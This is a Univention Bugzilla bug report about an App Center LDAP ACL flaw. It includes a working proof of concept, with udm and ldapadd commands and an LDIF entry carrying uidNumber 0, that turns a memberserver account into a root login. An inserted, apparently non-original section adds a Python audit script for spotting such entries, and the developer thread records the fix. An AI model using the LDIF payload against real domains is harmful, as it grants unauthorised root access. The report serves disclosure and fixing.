Univention Bugzilla – Bug 41724
univention-appcenter - take over complete domain as memberserver
Last modified: 2021-06-23 07:29:07 CEST
The ACL rules in the package univention-appcenter have to be adjusted.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=

$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort:
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
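As an added defender-side example (not part of this bug report and not Univention's own code), the following script audits an LDIF export of the App Center subtree for entries of the shape shown above: objects below cn=apps,cn=univention that carry object classes other than the registration classes, a uidNumber of 0, or a userPassword. The container DN suffix, the set of expected object classes (top, univentionApp, univentionObject) and the two sample entries are assumptions constructed for the example; the password hash in the sample is a placeholder, not a real credential. This is the check an admin could run against `slapcat`/`ldapsearch -LLL` output of a domain that has not yet received the ACL fix.

```python
import base64
import re
from typing import Dict, List, Tuple

# Assumption: App Center registrations live below cn=apps,cn=univention,<ldap base>.
APPS_CONTAINER = "cn=apps,cn=univention,"
# Assumption: object classes a legitimate App Center registration is expected to carry.
EXPECTED_CLASSES = {"top", "univentionapp", "univentionobject"}

Entry = Dict[str, List[str]]


def parse_ldif(text: str) -> List[Entry]:
    """Minimal LDIF reader: unfolds continuation lines, decodes 'attr:: base64'
    values and returns one dict per entry keyed by lower-cased attribute name."""
    entries: List[Entry] = []
    current: Entry = {}
    # LDIF folds long values: a line starting with a space continues the previous one.
    for line in re.sub(r"\n ", "", text).splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):  # 'attr:: <base64>' form
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr.strip().lower(), []).append(value)
    if current:
        entries.append(current)
    return entries


def audit_entry(entry: Entry) -> List[str]:
    """Findings for one entry; empty when it looks like a plain app registration."""
    dn = entry.get("dn", [""])[0]
    if APPS_CONTAINER not in dn.lower():
        return []  # outside the App Center subtree, not in scope here
    findings: List[str] = []
    classes = {c.lower() for c in entry.get("objectclass", [])}
    extra = classes - EXPECTED_CLASSES
    if extra:
        findings.append("unexpected objectClass: " + ", ".join(sorted(extra)))
    if entry.get("uidnumber", [""])[0] == "0":
        findings.append("uidNumber 0 (root) on an App Center object")
    if "userpassword" in entry:
        findings.append("userPassword set on an App Center object")
    return findings


def audit_ldif(text: str) -> List[Tuple[str, str]]:
    """(dn, finding) pairs for every suspicious entry in the LDIF text."""
    return [(e["dn"][0], msg) for e in parse_ldif(text) for msg in audit_entry(e)]


# Constructed sample: one legitimate registration and one entry of the shape
# described in the report. The hash is a placeholder, not a real credential.
_PW = base64.b64encode(b"{crypt}$6$constructed$placeholder").decode()
SAMPLE_LDIF = f"""\
dn: univentionAppID=goodapp,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
objectClass: top
objectClass: univentionApp
objectClass: univentionObject
univentionAppID: goodapp
description: a legitimate App Center registration,
  folded across two lines

dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: {_PW}
"""

if __name__ == "__main__":
    for dn, finding in audit_ldif(SAMPLE_LDIF):
        print(f"{dn}: {finding}")
```

The audit is deliberately an allowlist on object classes rather than a denylist of posixAccount: the ACL weakness was that the writer could choose any objectClass, so any class outside the expected registration set deserves a look, not just the one used in the report.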
*** Bug 32886 has been marked as a duplicate of this bug. ***
univention-appcenter (5.0.21-14): r70813 | Bug #41724: restrict access to univentionApp object class
univention-appcenter.yaml: r70817 | YAML Bug #41724
Tested it. One may still install Apps, they can be registered. Also, the example exploit is not possible anymore. Normally: VERIFIED. But we have >50 tests failing since the Bug was RESOLVED and they do not go away. I have reverted the patch to see whether this indeed has something to do with this very bug.
(In reply to Dirk Wiesenthal from comment #3)
> Tested it. One may still install Apps, they can be registered. Also, the
> example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> tests failing since the Bug was RESOLVED and they do not go away. I have
> reverted the patch to see whether this indeed has something to do with this
> very bug.

There are 32 fewer errors this night. But I guess this is caused by svn r70925 - not the revert.
(In reply to Florian Best from comment #4)
> (In reply to Dirk Wiesenthal from comment #3)
> > Tested it. One may still install Apps, they can be registered. Also, the
> > example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> > tests failing since the Bug was RESOLVED and they do not go away. I have
> > reverted the patch to see whether this indeed has something to do with this
> > very bug.
>
> There are 32 fewer errors this night. But I guess this is caused by svn
> r70925 - not the revert.

Yes, the revert was too late for the last Jenkins run.
(In reply to Stefan Gohmann from comment #5)
> (In reply to Florian Best from comment #4)
> > (In reply to Dirk Wiesenthal from comment #3)
> > > Tested it. One may still install Apps, they can be registered. Also, the
> > > example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> > > tests failing since the Bug was RESOLVED and they do not go away. I have
> > > reverted the patch to see whether this indeed has something to do with this
> > > very bug.
> >
> > There are 32 fewer errors this night. But I guess this is caused by svn
> > r70925 - not the revert.
>
> Yes, the revert was too late for the last Jenkins run.

Yes, the old version was installed in the tests:
univention-management-console-module-appcenter 5.0.21-14.182.201607041949

I will revert the revert sometime today. There are still ~6 different tests failing due to Bug #41715.
univention-appcenter (5.0.21-17): r70935 | Revert "* Bug #41724: Revert"
OK works. Tests are fine again.
<http://errata.software-univention.de/ucs/4.1/218.html>